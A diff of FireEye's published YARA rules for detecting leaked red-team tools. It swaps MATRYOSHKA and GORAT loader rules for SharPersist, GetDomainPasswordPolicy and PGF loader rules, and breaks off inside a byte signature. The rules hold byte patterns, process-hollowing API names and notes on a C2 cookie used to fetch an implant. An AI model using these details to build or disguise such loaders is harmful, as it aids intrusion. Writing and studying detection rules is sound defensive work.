-rule FIREEYE_RT_APT_Loader_Win_MATRYOSHKA_1 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_Sharpersist_2 : FILE
 {
 	meta:
-		description = "matryoshka_process_hollow.rs"
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "c07fb67e-ded5-593d-b5dc-d0e2c3b5a352"
-		date = "2020-12-02"
-		date = "2020-12-02"
+		id = "49d7891e-b97a-52a8-acfd-bbf986732d6c"
+		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Loader_Win_MATRYOSHKA_1.yar#L4-L24"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPERSIST/production/yara/HackTool_MSIL_SharPersist_2.yar#L4-L23"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "44887551a47ae272d7873a354d24042d"
-		logic_hash = "8f762684ffd3984630bf41ededa78b8993b53b22591a59912cabfe635775de53"
+		hash = "98ecf58d48a3eae43899b45cec0fc6b7"
+		logic_hash = "57387352f8fd08e8b859dffc1164d46370f248b337526c265634160010572a00"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$s1 = "ZwQueryInformationProcess" fullword
-		$s2 = "WriteProcessMemory" fullword
-		$s3 = "CreateProcessW" fullword
-		$s4 = "WriteProcessMemory" fullword
-		$s5 = "\x00Invalid NT Signature!\x00"
-		$s6 = "\x00Error while creating and mapping section. NTStatus: "
-		$s7 = "\x00Error no process information - NTSTATUS:"
-		$s8 = "\x00Error while erasing pe header. NTStatus: "
+		$a1 = "SharPersist.lib"
+		$a2 = "SharPersist.exe"
+		$b1 = "ERROR: Invalid hotkey location option given." ascii wide
+		$b2 = "ERROR: Invalid hotkey given." ascii wide
+		$b3 = "ERROR: Keepass configuration file not found." ascii wide
+		$b4 = "ERROR: Keepass configuration file was not found." ascii wide
+		$b5 = "ERROR: That value already exists in:" ascii wide
+		$b6 = "ERROR: Failed to delete hidden registry key." ascii wide
+		$pdb1 = "\\SharPersist\\"
+		$pdb2 = "\\SharPersist.pdb"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( ( @pdb2 [ 1 ] < @pdb1 [ 1 ] + 50 ) or ( 1 of ( $a* ) and 2 of ( $b* ) ) )
 }
-rule FIREEYE_RT_APT_Loader_Win64_MATRYOSHKA_2 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_Sharpersist_1 : FILE
 {
 	meta:
-		description = "matryoshka.rs"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the SharPersist project."
 		author = "FireEye"
-		id = "25f916bc-6ee1-5175-903c-4266b0a086e1"
-		date = "2020-12-02"
-		date = "2020-12-02"
+		id = "586e6c91-6970-57d1-8d8c-05ae9eb6117a"
+		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Loader_Win64_MATRYOSHKA_2.yar#L4-L20"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPERSIST/production/yara/HackTool_MSIL_SharPersist_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "7f8102b789303b7861a03290c79feba0"
-		logic_hash = "daa6f6d526bf959c268b2c5a4cae33307cfec5e9ca51283131bbfa66a582b505"
+		hash = "98ecf58d48a3eae43899b45cec0fc6b7"
+		logic_hash = "cf480026c31b522850e25ba2d7986773d9c664242a2667ecd33151621c98c91e"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$sb1 = { 4D [2] 00 49 [2] 08 B? 02 00 00 00 31 ?? E8 [4] 48 89 ?? 48 89 ?? 4C 89 ?? 49 89 ?? E8 [4] 4C 89 ?? 48 89 ?? E8 [4] 83 [2] 01 0F 84 [4] 48 89 ?? 48 8B [2] 48 8B [2] 48 89 [5] 48 89 [5] 48 89 [5] 41 B? [4] 4C 89 ?? 31 ?? E8 [4] C7 45 [5] 48 89 ?? 4C 89 ?? E8 [4] 85 C0 }
-		$sb2 = { 4C [2] 0F 83 [4] 41 0F [3] 01 41 32 [2] 00 48 8B [5] 48 3B [5] 75 ?? 41 B? 01 00 00 00 4C 89 ?? E8 [4] E9 }
-		$si1 = "CreateToolhelp32Snapshot" fullword
-		$si2 = "Process32Next" fullword
+		$typelibguid1 = "9D1B853E-58F1-4BA5-AEFC-5C221CA30E48" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $typelibguid1
 }
-rule FIREEYE_RT_APT_Dropper_Win64_MATRYOSHKA_1 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_GETDOMAINPASSWORDPOLICY_1 : FILE
 {
 	meta:
-		description = "matryoshka_dropper.rs"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the recon utility 'getdomainpasswordpolicy' project."
 		author = "FireEye"
-		id = "1406aafd-6217-51ef-b3af-107ee88f9c99"
-		date = "2020-12-02"
-		date = "2020-12-02"
+		id = "69745e99-33cc-5171-ae7a-5c98439a0b6d"
+		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Dropper_Win64_MATRYOSHKA_1.yar#L4-L18"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/GETDOMAINPASSWORDPOLICY/production/yara/HackTool_MSIL_GETDOMAINPASSWORDPOLICY_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "edcd58ba5b1b87705e95089002312281"
-		logic_hash = "23f811f8e9387ca6a1257a31af66de9739733e4728adba0a3e3f74b5e5c0a556"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "6b2ea3ebfea2c87f16052f4a43b64eb2d595c2dd4a64d45dfce1642668dcf602"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		rev = 1
+		rev = 4
 
 	strings:
-		$sb1 = { 8D 8D [4] E8 [4] 49 89 D0 C6 [2-6] 01 C6 [2-6] 01 [0-8] C7 44 24 ?? 0E 00 00 00 4C 8D 0D [4] 48 8D 8D [4] 48 89 C2 E8 [4] C6 [2-6] 01 C6 [2-6] 01 48 89 E9 48 8D 95 [4] E8 [4] 83 [2] 01 0F 8? [4] 48 01 F3 48 29 F7 48 [2] 08 48 89 85 [4] C6 [2-6] 01 C6 [2-6] 01 C6 [2-6] 01 48 8D 8D [4] 48 89 DA 49 89 F8 E8 }
-		$sb2 = { 0F 29 45 ?? 48 C7 45 ?? 00 00 00 00 0F 29 45 ?? 0F 29 45 ?? 0F 29 45 ?? 0F 29 45 ?? 0F 29 45 ?? 0F 29 45 ?? 48 C7 45 ?? 00 00 00 00 C7 45 ?? 68 00 00 00 48 8B [2] 48 8D [2] 48 89 [3] 48 89 [3] 0F 11 44 24 ?? C7 44 24 ?? 08 00 00 0C C7 44 24 ?? 00 00 00 00 31 ?? 48 89 ?? 31 ?? 45 31 ?? 45 31 ?? E8 [4] 83 F8 01 }
+		$typelibguid0 = "a5da1897-29aa-45f4-a924-561804276f08" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
+		filesize < 10MB and ( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Builder_Win64_MATRYOSHKA_1 : FILE
+rule FIREEYE_RT_APT_Loader_Win64_PGF_5 : FILE
 {
 	meta:
-		description = "matryoshka_pe_to_shellcode.rs"
+		description = "PGF payload, generated rule based on symfunc/8167a6d94baca72bac554299d7c7f83c"
 		author = "FireEye"
-		id = "0afcf13e-5cd3-5c1c-897e-b6d0c283ab0f"
-		date = "2020-12-02"
-		date = "2020-12-02"
+		id = "4fa4a1d6-cb63-582d-801c-b4c89c44d9ca"
+		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Builder_Win64_MATRYOSHKA_1.yar#L4-L20"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win64_PGF_5.yar#L4-L18"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "8d949c34def898f0f32544e43117c057"
-		logic_hash = "b370d7dea44bccc92fc8dbd4ea0ee9bec523820108bf8bc67acb17ebf9835f74"
+		hash = "150224a0ccabce79f963795bf29ec75b"
+		logic_hash = "16495ad1e5ce4d4a79f4067f3d687911a1a0a3bfe4c6409ff9de4d111b1ddca6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 1
+		rev = 3
 
 	strings:
-		$sb1 = { 4D 5A 45 52 [0-32] E8 [0-32] 00 00 00 00 [0-32] 5B 48 83 EB 09 53 48 81 [0-32] C3 [0-32] FF D3 [0-32] C3 }
-		$ss1 = "\x00Stub Size: "
-		$ss2 = "\x00Executable Size: "
-		$ss3 = "\x00[+] Writing out to file"
+		$cond1 = { 4C 89 44 24 18 89 54 24 10 48 89 4C 24 08 48 83 EC 38 48 8B 4C 24 40 FF 15 13 FA FF FF 8B 44 24 48 89 44 24 20 83 7C 24 20 01 74 02 EB 17 48 8B 44 24 40 48 89 05 66 23 00 00 48 8B 4C 24 40 FF 15 EB F9 FF FF B8 01 00 00 00 48 83 C4 38 C3 }
+		$cond2 = { 4C 89 44 24 18 89 54 24 10 48 89 4C 24 08 48 83 EC 38 48 8B 4C 24 40 FF 15 A3 FA FF FF 8B 44 24 48 89 44 24 20 83 7C 24 20 01 74 02 EB 17 48 8B 44 24 40 48 89 05 F6 20 00 00 48 8B 4C 24 40 FF 15 7B FA FF FF B8 01 00 00 00 48 83 C4 38 C3 }
+		$cond3 = { 4C 89 44 24 18 89 54 24 10 48 89 4C 24 08 48 83 EC 38 48 8B 4C 24 40 FF ?? ?? ?? ?? ?? 8B 44 24 48 89 44 24 20 83 7C 24 2? ?1 74 ?? EB ?? 48 8B 44 24 40 48 ?? ?? ?? ?? ?? ?? 48 8B 4C 24 40 FF ?? ?? ?? ?? ?? B8 01 ?? ?? ?? 48 83 C4 38 C3 }
+		$cond4 = { 4C 89 44 24 ?? 89 54 24 ?? 48 89 4C 24 ?? 48 83 EC 38 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 83 7C 24 ?? 01 74 ?? EB ?? 48 8B 44 24 ?? 48 89 05 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? B8 01 00 00 00 48 83 C4 38 C3 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and any of them
 }
-rule FIREEYE_RT_APT_Builder_PY_MATRYOSHKA_1
+rule FIREEYE_RT_APT_Loader_Win32_PGF_4 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "0135f3bb-28b3-5fc4-85a2-b12c46c8bc45"
-		date = "2020-12-02"
-		date = "2020-12-02"
-		modified = "2020-12-09"
-		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Builder_PY_MATRYOSHKA_1.yar#L4-L22"
-		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "25a97f6dba87ef9906a62c1a305ee1dd"
-		logic_hash = "71b26f4b319429ac356b55d22bccd1da85894d61f8c96452422de78d2d893420"
-		score = 75
-		quality = 50
-		tags = ""
-		rev = 1
-
-	strings:
-		$s1 = ".pop(0)])"
-		$s2 = "[1].replace('unsigned char buf[] = \"'"
-		$s3 = "binascii.hexlify(f.read()).decode("
-		$s4 = "os.system(\"cargo build {0} --bin {1}\".format("
-		$s5 = "shutil.which('rustc')"
-		$s6 = "~/.cargo/bin"
-		$s7 = /[\x22\x27]\\\\x[\x22\x27]\.join\(\[\w{1,64}\[\w{1,64}:\w{1,64}[\x09\x20]{0,32}\+[\x09\x20]{0,32}2\]/
-
-	condition:
-		all of them
-}
-rule FIREEYE_RT_APT_Loader_Win64_MATRYOSHKA_1 : FILE
-{
-	meta:
-		description = "matryoshka_process_hollow.rs"
-		author = "FireEye"
-		id = "69919a80-8ed1-5b8c-911a-ceb75570f11f"
-		date = "2020-12-02"
-		date = "2020-12-02"
+		id = "d46d9ae9-cb7d-5a25-9ee2-766097c14af6"
+		date = "2020-11-26"
+		date = "2020-11-26"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Loader_Win64_MATRYOSHKA_1.yar#L4-L19"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win32_PGF_4.yar#L4-L17"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "44887551a47ae272d7873a354d24042d"
-		logic_hash = "46e5480dc95ce8b9d8385c2e44a50b21629301535b93833c13cc3db319ac15dd"
+		hash = "4414953fa397a41156f6fa4f9462d207"
+		logic_hash = "4256bfd3713f330d76cad9d1ddbba91e588dbca2e2b6842e9482525805ddc1e8"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$sb1 = { 48 8B 45 ?? 48 89 85 [0-64] C7 45 ?? 00 00 00 00 31 ?? E8 [4-64] BA 00 10 00 00 [0-32] 41 B8 04 00 00 00 E8 [4] 83 F8 01 [2-32] BA [4] E8 }
-		$sb2 = { E8 [4] 83 F8 01 [2-64] 41 B9 00 10 00 00 [0-32] E8 [4] 83 F8 01 [2-32] 3D 4D 5A 00 00 [0-32] 48 63 ?? 3C [0-32] 50 45 00 00 [4-64] 0F B7 [2] 18 81 ?? 0B 01 00 00 [2-32] 81 ?? 0B 02 00 00 [2-32] 8B [2] 28 }
-		$sb3 = { 66 C7 45 ?? 48 B8 48 C7 45 ?? 00 00 00 00 66 C7 45 ?? FF E0 [0-64] 41 B9 40 00 00 00 [0-32] E8 [4] 83 F8 01 }
+		$sb1 = { C7 44 24 0C 04 00 00 00 C7 44 24 08 00 10 00 00 [4-32] C7 04 24 00 00 00 00 [0-32] FF [1-16] 89 45 ?? 83 7D ?? 00 [2-150] 0F B? ?? 8B [2] B? CD CC CC CC 89 ?? F7 ?? C1 ?? 04 89 ?? C1 ?? 02 [0-32] 0F B? [5-32] 3? [1-16] 88 }
+		$sb2 = { C? 45 ?? B8 [0-4] C? 45 ?? 00 [0-64] FF [0-32] E0 [0-32] C7 44 24 08 40 00 00 00 [0-32] C7 44 24 04 07 00 00 00 [0-32] FF [1-64] 89 ?? 0F B? [2-3] 89 ?? 04 0F B? [2] 88 ?? 06 8B ?? 08 8D ?? 01 8B 45 0C }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and all of them
 }
-rule FIREEYE_RT_APT_Dropper_Win_MATRYOSHKA_1 : FILE
+rule FIREEYE_RT_APT_Loader_Win32_PGF_2 : FILE
 {
 	meta:
-		description = "matryoshka_dropper.rs"
+		description = "base dlls: /lib/payload/techniques/dllmain/"
 		author = "FireEye"
-		id = "7fd305c7-0b1b-5d91-b968-7f1fb0a8ae47"
-		date = "2020-12-02"
-		date = "2020-12-02"
+		id = "e11a626b-ce91-5f6c-a514-9a8a02a29cbd"
+		date = "2020-11-25"
+		date = "2020-11-25"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Dropper_Win_MATRYOSHKA_1.yar#L4-L20"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win32_PGF_2.yar#L4-L19"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "edcd58ba5b1b87705e95089002312281"
-		logic_hash = "a7bf7599ec9b4b1d09a8c90b70ae565a9396fb31d449da3c1492d6fa336d9c5e"
+		hash = "04eb45f8546e052fe348fda2425b058c"
+		logic_hash = "d69f3f31c4964fe933295563e08bdbb36abadd6611541b9ffa55b6829ced1d21"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$s1 = "\x00matryoshka.exe\x00"
-		$s2 = "\x00Unable to write data\x00"
-		$s3 = "\x00Error while spawning process. NTStatus: \x0a\x00"
-		$s4 = "\x00.execmdstart/Cfailed to execute process\x00"
+		$sb1 = { 6A ?? FF 15 [4-16] 8A ?? 04 [0-16] 8B ?? 1C [0-64] 0F 10 ?? 66 0F EF C8 0F 11 [0-32] 30 [2] 8D [2] 4? 83 [2] 7? }
+		$sb2 = { 8B ?? 08 [0-16] 6A 40 68 00 30 00 00 5? 6A 00 [0-32] FF 15 [4-32] 5? [0-16] E8 [4-64] C1 ?? 04 [0-32] 8A [2] 3? [2] 4? 3? ?? 24 ?? 7? }
+		$sb3 = { 8B ?? 3C [0-16] 03 [1-64] 0F B? ?? 14 [0-32] 83 ?? 18 [0-32] 66 3? ?? 06 [4-32] 68 [4] 5? FF 15 [4-16] 85 C0 [2-32] 83 ?? 28 0F B? ?? 06 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and all of them
 }
-rule FIREEYE_RT_APT_Backdoor_Win_GORAT_1 : FILE
+rule FIREEYE_RT_APT_Loader_Win32_PGF_3 : FILE
 {
 	meta:
-		description = "This detects if a sample is less than 50KB and has a number of strings found in the Gorat shellcode (stage0 loader). The loader contains an embedded DLL (stage0.dll) that contains a number of unique strings. The 'Cookie' string found in this loader is important as this cookie is needed by the C2 server to download the Gorat implant (stage1 payload)."
+		description = "PGF payload, generated rule based on symfunc/c02594972dbab6d489b46c5dee059e66. Identifies dllmain_hook x86 payloads."
 		author = "FireEye"
-		id = "5ac84cf1-49fb-533d-b211-b1a92239063b"
+		id = "adf91482-6e04-5d11-bc00-4b1c7a802c49"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_Win_GORAT_1.yar#L4-L23"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win32_PGF_3.yar#L4-L20"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "66cdaa156e4d372cfa3dea0137850d20"
-		logic_hash = "f6a0a923f64375e7ffdc080aec41db19a9e162405f1290ed0bbcce5a342bdadb"
+		hash = "4414953fa397a41156f6fa4f9462d207"
+		logic_hash = "24d2caad1d740ccbff0cf111a05ecad20ed06f311d530d8de86050d916da32ce"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		rev = 4
 
 	strings:
-		$s1 = "httpComms.dll" ascii wide
-		$s2 = "Cookie: SID1=%s" ascii wide
-		$s3 = "Global\\" ascii wide
-		$s4 = "stage0.dll" ascii wide
-		$s5 = "runCommand" ascii wide
-		$s6 = "getData" ascii wide
-		$s7 = "initialize" ascii wide
-		$s8 = "Windows NT %d.%d;" ascii wide
-		$s9 = "!This program cannot be run in DOS mode." ascii wide
+		$cond1 = { 55 89 E5 57 56 53 81 EC FC 06 00 00 C7 85 2C F9 FF FF 90 EE 01 6D C7 85 30 F9 FF FF 6C FE 01 6D 8D 85 34 F9 FF FF 89 28 BA CC 19 00 6D 89 50 04 89 60 08 8D 85 14 F9 FF FF 89 04 24 E8 BB A6 00 00 A1 48 A1 05 6D C7 85 18 F9 FF FF FF FF FF FF FF D0 C7 44 24 08 04 01 00 00 8D 95 B6 FD FF FF 89 54 24 04 89 04 24 E8 B8 AE 00 00 83 EC 0C 85 C0 0F 94 C0 84 C0 0F 85 8B 03 00 00 8D 45 BF 89 C1 E8 56 0B 01 00 8D 85 9C FD FF FF 8D 55 BF 89 54 24 04 8D 95 B6 FD FF FF 89 14 24 C7 85 18 F9 FF FF 01 00 00 00 89 C1 E8 DF B5 01 00 83 EC 08 8D 45 BF 89 C1 E8 52 0B 01 00 A1 4C A1 05 6D C7 85 18 F9 FF FF 02 00 00 00 FF D0 89 44 24 04 C7 04 24 08 00 00 00 E8 51 AE 00 00 83 EC 08 89 45 D0 83 7D D0 00 75 0F C7 85 10 F9 FF FF 00 00 00 00 E9 8C 02 00 00 C7 45 E4 00 00 00 00 C7 45 E0 00 00 00 00 C7 85 74 F9 FF FF 28 04 00 00 8D 85 74 F9 FF FF 89 44 24 04 8B 45 D0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 EF AD 00 00 83 EC 08 89 45 DC 83 7D DC 00 74 67 8D 85 9C FD FF FF C7 44 24 04 00 00 00 00 8D 95 74 F9 FF FF 83 C2 20 89 14 24 89 C1 E8 82 FF 00 00 83 EC 08 83 F8 FF 0F 95 C0 84 C0 74 12 8B 85 88 F9 FF FF 89 45 E4 8B 85 8C F9 FF FF 89 45 E0 8D 85 74 F9 FF FF 89 44 24 04 8B 45 D0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 84 AD 00 00 83 EC 08 89 45 DC EB 93 8B 45 D0 89 04 24 A1 2C A1 05 6D C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 04 83 7D E4 00 74 06 83 7D E0 00 75 0F C7 85 10 F9 FF FF 00 00 00 00 E9 AD 01 00 00 C7 04 24 0C 40 05 6D A1 5C A1 05 6D C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 04 C7 44 24 04 18 40 05 6D 89 04 24 A1 60 A1 05 6D FF D0 83 EC 08 89 45 CC 89 E8 89 45 D8 8D 85 6C F9 FF FF 89 44 24 04 8D 85 70 F9 FF FF 89 04 24 A1 54 A1 05 6D FF D0 83 EC 08 C7 45 D4 00 00 00 00 8B 55 D8 8B 85 6C F9 FF FF 39 C2 0F 83 F5 00 00 00 8B 45 D8 8B 00 3D FF 0F 00 00 0F 86 D8 00 00 00 8B 45 D8 8B 00 39 45 CC 73 19 8B 45 D8 8B 00 8B 55 CC 81 C2 00 10 00 00 39 D0 73 07 C7 45 D4 01 00 00 00 83 7D D4 00 0F 84 AF 00 00 00 8B 45 D8 8B 00 39 45 E4 0F 83 A1 00 00 00 8B 45 D8 8B 00 8B 4D E4 8B 55 E0 01 CA 39 D0 0F 83 8C 00 00 00 B9 00 00 00 00 B8 1C 00 00 00 83 E0 FC 89 C2 B8 00 00 00 00 89 8C 05 50 F9 FF FF 83 C0 04 39 D0 72 F2 8B 45 D8 8B 00 C7 44 24 08 1C 00 00 00 8D 95 50 F9 FF FF 89 54 24 04 89 04 24 A1 9C A1 05 6D C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 0C 8B 85 64 F9 FF FF 83 E0 20 85 C0 74 2E 8B 45 D8 8B 00 C7 44 24 04 30 14 00 6D 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 59 FC FF FF C7 85 10 F9 FF FF 00 00 00 00 EB 58 90 EB 01 90 83 45 D8 04 E9 FA FE FF FF 8B 45 E4 89 45 C8 8B 45 C8 8B 40 3C 89 C2 8B 45 E4 01 D0 89 45 C4 8B 45 C4 8B 50 28 8B 45 E4 01 D0 89 45 C0 C7 44 24 04 30 14 00 6D 8B 45 C0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 FF FB FF FF C7 85 10 F9 FF FF 01 00 00 00 8D 85 9C FD FF FF 89 C1 E8 5D BC 01 00 83 BD 10 F9 FF FF 01 EB 70 8B 95 1C F9 FF FF 8B 85 18 F9 FF FF 85 C0 74 0C 83 E8 01 85 C0 74 2D 83 E8 01 0F 0B 89 95 10 F9 FF FF 8D 45 BF 89 C1 E8 48 08 01 00 8B 85 10 F9 FF FF 89 04 24 C7 85 18 F9 FF FF FF FF FF FF E8 A0 A6 00 00 89 95 10 F9 FF FF 8D 85 9C FD FF FF 89 C1 E8 FD BB 01 00 8B 85 10 F9 FF FF 89 04 24 C7 85 18 F9 FF FF FF FF FF FF E8 75 A6 00 00 90 8D 85 14 F9 FF FF 89 04 24 E8 76 A3 00 00 8D 65 F4 5B 5E 5F 5D C3 }
+		$cond2 = { 55 89 E5 57 56 53 81 EC FC 06 00 00 C7 85 2C F9 FF FF B0 EF 3D 6A C7 85 30 F9 FF FF 8C FF 3D 6A 8D 85 34 F9 FF FF 89 28 BA F4 1A 3C 6A 89 50 04 89 60 08 8D 85 14 F9 FF FF 89 04 24 E8 B3 A6 00 00 A1 64 A1 41 6A C7 85 18 F9 FF FF FF FF FF FF FF D0 C7 44 24 08 04 01 00 00 8D 95 B6 FD FF FF 89 54 24 04 89 04 24 E8 B0 AE 00 00 83 EC 0C 85 C0 0F 94 C0 84 C0 0F 85 8B 03 00 00 8D 45 BF 89 C1 E8 4E 0B 01 00 8D 85 9C FD FF FF 8D 55 BF 89 54 24 04 8D 95 B6 FD FF FF 89 14 24 C7 85 18 F9 FF FF 01 00 00 00 89 C1 E8 D7 B5 01 00 83 EC 08 8D 45 BF 89 C1 E8 4A 0B 01 00 A1 68 A1 41 6A C7 85 18 F9 FF FF 02 00 00 00 FF D0 89 44 24 04 C7 04 24 08 00 00 00 E8 49 AE 00 00 83 EC 08 89 45 D0 83 7D D0 00 75 0F C7 85 10 F9 FF FF 00 00 00 00 E9 8C 02 00 00 C7 45 E4 00 00 00 00 C7 45 E0 00 00 00 00 C7 85 74 F9 FF FF 28 04 00 00 8D 85 74 F9 FF FF 89 44 24 04 8B 45 D0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 E7 AD 00 00 83 EC 08 89 45 DC 83 7D DC 00 74 67 8D 85 9C FD FF FF C7 44 24 04 00 00 00 00 8D 95 74 F9 FF FF 83 C2 20 89 14 24 89 C1 E8 7A FF 00 00 83 EC 08 83 F8 FF 0F 95 C0 84 C0 74 12 8B 85 88 F9 FF FF 89 45 E4 8B 85 8C F9 FF FF 89 45 E0 8D 85 74 F9 FF FF 